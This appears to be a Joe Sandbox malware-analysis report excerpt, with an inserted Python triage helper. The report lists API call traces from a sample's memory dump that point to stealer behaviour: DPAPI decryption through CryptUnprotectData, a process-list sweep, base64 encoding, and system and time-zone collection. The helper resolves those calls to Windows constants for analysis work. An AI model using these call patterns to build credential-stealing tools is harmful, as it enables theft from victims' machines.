                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: cd924e3af750923514768874bdd2de30fc58d60baea114fb7d1953adf4cd6e23
                                    • Instruction ID: bd2c016b5e601d25806428348aa478043ffbb243bf6126678f8153f9b386d48b
                                    • Opcode Fuzzy Hash: cd924e3af750923514768874bdd2de30fc58d60baea114fb7d1953adf4cd6e23
                                    • Instruction Fuzzy Hash: A241507590431EDBDB10DFA0ED89BFEB7B8AB44309F1041A8F609A7280D7745A84DFA5
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00C96C0C
                                    • sscanf.NTDLL ref: 00C96C39
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C96C52
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C96C60
                                    • ExitProcess.KERNEL32 ref: 00C96C7A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: abf33e50de34d412ab2d8d32aad83b44c3a1ee75e5ad368e87221b074b30b005
                                    • Instruction ID: 50554bbe1b6e7a5c62cb61e74931d87fdeb99fc8879ff5740aed1095f0049b32
                                    • Opcode Fuzzy Hash: abf33e50de34d412ab2d8d32aad83b44c3a1ee75e5ad368e87221b074b30b005
                                    • Instruction Fuzzy Hash: D521CB75D1420CABCF04EFE4E8499EEB7B9BF48301F04856AF516E3250EB349608DB69
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C872AD
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C872B4
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C872E1
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C87304
                                    • LocalFree.KERNEL32(?), ref: 00C8730E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 194eb9d2b0556a0cd4dedfed098f8697e07676cce5b3f42f75d6146c85154382
                                    • Instruction ID: 7b8f2bbcc220ab3ab1600e4744471601143147432bf0411f7d200023f6802618
                                    • Opcode Fuzzy Hash: 194eb9d2b0556a0cd4dedfed098f8697e07676cce5b3f42f75d6146c85154382
                                    • Instruction Fuzzy Hash: 53011EB5A44308BBDB10EFE4DC46F9E7778AB44B05F204544FB05AB2C0DAB0AA009B65
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C997AE
                                    • Process32First.KERNEL32(00CA0ACE,00000128), ref: 00C997C2
                                    • Process32Next.KERNEL32(00CA0ACE,00000128), ref: 00C997D7
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00C997EC
                                    • CloseHandle.KERNEL32(00CA0ACE), ref: 00C9980A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: 4534ada02ca61408c4586b90e798ad27e9aec8a4a21aef0655158306e10537ac
                                    • Instruction ID: 0ffc7522c23f8a274c852790d300d4ae8f0f6359cc75e8d29a84a76e1c1b5d9b
                                    • Opcode Fuzzy Hash: 4534ada02ca61408c4586b90e798ad27e9aec8a4a21aef0655158306e10537ac
                                    • Instruction Fuzzy Hash: 3201E975A14308EBDF20DFA5DD48BEDB7B8EB08701F10458CE50996280EB709B40DF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: <7\h$huzx
                                    • API String ID: 0-2989614873
                                    • Opcode ID: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                    • Instruction ID: fca3dca083d09b05dbaf72822bf328ba4bb1215a08fc7537399e5e58001186ac
                                    • Opcode Fuzzy Hash: 1d306a64b32ec80efcd30ebbf21bf8be57d4a3a31a1eaaf5b560232c1a76f8cf
                                    • Instruction Fuzzy Hash: 4963863241EBD61ECB27CF3047B62917F66BA1321831D8ACEC4D18F5B3C6949A16E356
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00C851D4,40000001,00000000,00000000,?,00C851D4), ref: 00C99050
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: f677e76f8046673077448717ff90f9fa6b0994b704d74d91751c9034bd775912
                                    • Instruction ID: b104069a1b9c71d2e19c1d133f62f190be7dcd5434b6743806080e53f4702d7c
                                    • Opcode Fuzzy Hash: f677e76f8046673077448717ff90f9fa6b0994b704d74d91751c9034bd775912
                                    • Instruction Fuzzy Hash: FC110A70204308FFDF00DF59D889FAB33A9EF8A311F109448FA298B250D772E9419B60
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A23F
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00C84F3E,00000000,?), ref: 00C8A251
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A27A
                                    • LocalFree.KERNEL32(?,?,?,?,00C84F3E,00000000,?), ref: 00C8A28F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: 083cfbe814bd77ea99b38e9f3f11b2613586d7d73478f0954fed3d4399f1f522
                                    • Instruction ID: 13428e13720311803a8e3b4d16c59be79141a1b6d1a4a7bd3072c57374ef13ae
                                    • Opcode Fuzzy Hash: 083cfbe814bd77ea99b38e9f3f11b2613586d7d73478f0954fed3d4399f1f522
                                    • Instruction Fuzzy Hash: 4711D474240308AFEB10DF64DC95FAA77B5EB88B15F208089FE199B390C772AA41CB54
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0152DB48,00000000,?,00CA0DF8,00000000,?,00000000,00000000), ref: 00C97BF3
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C97BFA
                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0152DB48,00000000,?,00CA0DF8,00000000,?,00000000,00000000,?), ref: 00C97C0D
                                    • wsprintfA.USER32 ref: 00C97C47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID:
                                    • API String ID: 3317088062-0
                                    • Opcode ID: 5b927367cb47519fbfb654d1bcad52a16d6594a7137cdccdf39ac2248a2093b6
                                    • Instruction ID: 7a7f4660ef283be8047f1c7b87488b4ae6346e1f1c442c20ad3ac3bd8ba6df5c
                                    • Opcode Fuzzy Hash: 5b927367cb47519fbfb654d1bcad52a16d6594a7137cdccdf39ac2248a2093b6
                                    • Instruction Fuzzy Hash: 7411A1B190A318EBEB209B55DD49FA9B778FB44711F1003E5F61AA32D0DB745E409F50
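The "APIs" lists in these records print every argument as a raw hex word, which hides what the call actually does: the 00000002 passed to CreateToolhelp32Snapshot, the 00000128 passed to Process32First/Next, the 00000001 and 40000001 flag words passed to CryptStringToBinaryA/CryptBinaryToStringA, and the 00000040 passed to LocalAlloc all have Windows SDK names. The following Python is an added triage helper, not part of the Joe Sandbox report or its IDA plugin: it parses lines in the `• Name.MODULE(args), ref: ADDR` shape shown above (an assumed format, inferred from this page), resolves those arguments to their SDK constant names, and recognises the two call patterns visible in the records on this page, the Toolhelp32 process walk (Snapshot, Process32First, Process32Next, name comparison, CloseHandle) and the two-call CryptStringToBinaryA base64 decode with a LocalAlloc in between. The sample lines are copied from the records above; the constant values come from the Windows SDK headers, and the PROCESSENTRY32 size check assumes the 32-bit ANSI layout this sample uses.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: call lines copied from the function records on this page.
# Assumed line format: "• Name.MODULE(arg,arg,...), ref: ADDR"; "?" is an unresolved argument.
SAMPLE = """\
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00C997AE
• Process32First.KERNEL32(00CA0ACE,00000128), ref: 00C997C2
• Process32Next.KERNEL32(00CA0ACE,00000128), ref: 00C997D7
• StrCmpCA.SHLWAPI(?,00000000), ref: 00C997EC
• CloseHandle.KERNEL32(00CA0ACE), ref: 00C9980A
• CryptBinaryToStringA.CRYPT32(00000000,00C851D4,40000001,00000000,00000000,?,00C851D4), ref: 00C99050
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A23F
• LocalAlloc.KERNEL32(00000040,?,?,?,00C84F3E,00000000,?), ref: 00C8A251
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A27A
• wsprintfA.USER32 ref: 00C97C47
"""

API_RE = re.compile(
    r"[•*-]?\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]  # hex strings as printed, or "?" when the plugin could not resolve them
    ref: int         # address of the call site

    def arg(self, i: int) -> Optional[int]:
        """Numeric value of argument i, or None if it is missing or unresolved."""
        if i >= len(self.args) or self.args[i] == "?":
            return None
        return int(self.args[i], 16)

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls

# Constant values as defined in the Windows SDK headers.
TH32CS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD",
          0x8: "TH32CS_SNAPMODULE", 0x10: "TH32CS_SNAPMODULE32"}
LMEM = {0x2: "LMEM_MOVEABLE", 0x40: "LMEM_ZEROINIT"}  # 0x0 alone is LMEM_FIXED
CRYPT_STRING_FORMAT = {0x0: "CRYPT_STRING_BASE64HEADER", 0x1: "CRYPT_STRING_BASE64",
                       0x2: "CRYPT_STRING_BINARY", 0x4: "CRYPT_STRING_HEX", 0xC: "CRYPT_STRING_HEXRAW"}
CRYPT_STRING_MOD = {0x80000000: "CRYPT_STRING_NOCR", 0x40000000: "CRYPT_STRING_NOCRLF",
                    0x20000000: "CRYPT_STRING_STRICT"}

def bits(value: int, table: Dict[int, str], zero: str) -> str:
    names = [n for bit, n in table.items() if value & bit]
    return "|".join(names) if names else zero

def crypt_string_flags(value: int) -> str:
    # Low 16 bits select the string format; the high bits are OR-able modifiers.
    fmt = CRYPT_STRING_FORMAT.get(value & 0xFFFF, f"format_{value & 0xFFFF:#x}")
    return "|".join([fmt] + [n for bit, n in CRYPT_STRING_MOD.items() if value & bit])

def pe32_size(value: int) -> str:
    # 0x128 == 296 == sizeof(PROCESSENTRY32) for the 32-bit ANSI layout (assumption for this sample).
    return "sizeof(PROCESSENTRY32)" if value == 0x128 else f"{value:#x}"

# (API name, argument index) -> decoder for that argument.
ARG_DECODERS = {
    ("CreateToolhelp32Snapshot", 0): lambda v: bits(v, TH32CS, "0"),
    ("Process32First", 1): pe32_size,
    ("Process32Next", 1): pe32_size,
    ("LocalAlloc", 0): lambda v: "LPTR" if v == 0x40 else bits(v, LMEM, "LMEM_FIXED"),
    ("CryptStringToBinaryA", 2): crypt_string_flags,
    ("CryptBinaryToStringA", 2): crypt_string_flags,
}

def annotate(call: ApiCall) -> Dict[int, str]:
    """Resolve every argument of `call` that has both a decoder and a concrete value."""
    return {idx: decode(call.arg(idx)) for (name, idx), decode in ARG_DECODERS.items()
            if name == call.name and call.arg(idx) is not None}

def toolhelp_enumeration_handle(calls: List[ApiCall]) -> Optional[int]:
    """Snapshot handle if Snapshot -> Process32First -> Process32Next -> CloseHandle all
    operate on one handle, i.e. the record walks the process list; otherwise None."""
    names = [c.name for c in calls]
    try:
        i = names.index("CreateToolhelp32Snapshot")
        f = names.index("Process32First", i)
        n = names.index("Process32Next", f)
        c = names.index("CloseHandle", n)
    except ValueError:
        return None
    h = calls[f].arg(0)
    return h if h is not None and calls[n].arg(0) == h and calls[c].arg(0) == h else None

def base64_size_probe(calls: List[ApiCall]) -> bool:
    """True for the 'query size, LocalAlloc, decode again' CryptStringToBinaryA sequence."""
    names = [c.name for c in calls]
    return any(names[i:i + 3] == ["CryptStringToBinaryA", "LocalAlloc", "CryptStringToBinaryA"]
               for i in range(len(names) - 2))

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    for c in calls:
        print(f"{c.ref:08X} {c.module}!{c.name} {annotate(c)}")
    print("toolhelp handle:", toolhelp_enumeration_handle(calls))
    print("base64 size probe:", base64_size_probe(calls))
```

Run against the sample, the Toolhelp chain resolves to TH32CS_SNAPPROCESS on handle 00CA0ACE with a PROCESSENTRY32-sized buffer, which is what a process-name sweep looks like before the StrCmpCA comparison; the CRYPT32 calls resolve to CRYPT_STRING_BASE64 on decode and CRYPT_STRING_BASE64|CRYPT_STRING_NOCRLF on encode, and the decode record shows the size-probe-then-decode pattern around an LPTR allocation. The "?" arguments are left unresolved on purpose: they are values the plugin could not recover, and guessing them would put fabricated data in the triage notes.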
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 7L^O$T;8$to=$JU.
                                    • API String ID: 0-3591199257
                                    • Opcode ID: 9808a581958dbafa64386bac1e6c766fe9c543167bd7f38f1400c13b86bfede2
                                    • Instruction ID: 1a601e52411f8448d3afbf90e6fe8270c043130b561e814cac8ddbae9366ecbe
                                    • Opcode Fuzzy Hash: 9808a581958dbafa64386bac1e6c766fe9c543167bd7f38f1400c13b86bfede2
                                    • Instruction Fuzzy Hash: 4B12F5F390C210AFE7046E2DEC8566ABBE5EF94320F1A4A3DEAC4C7744E63558058797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                     • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmp
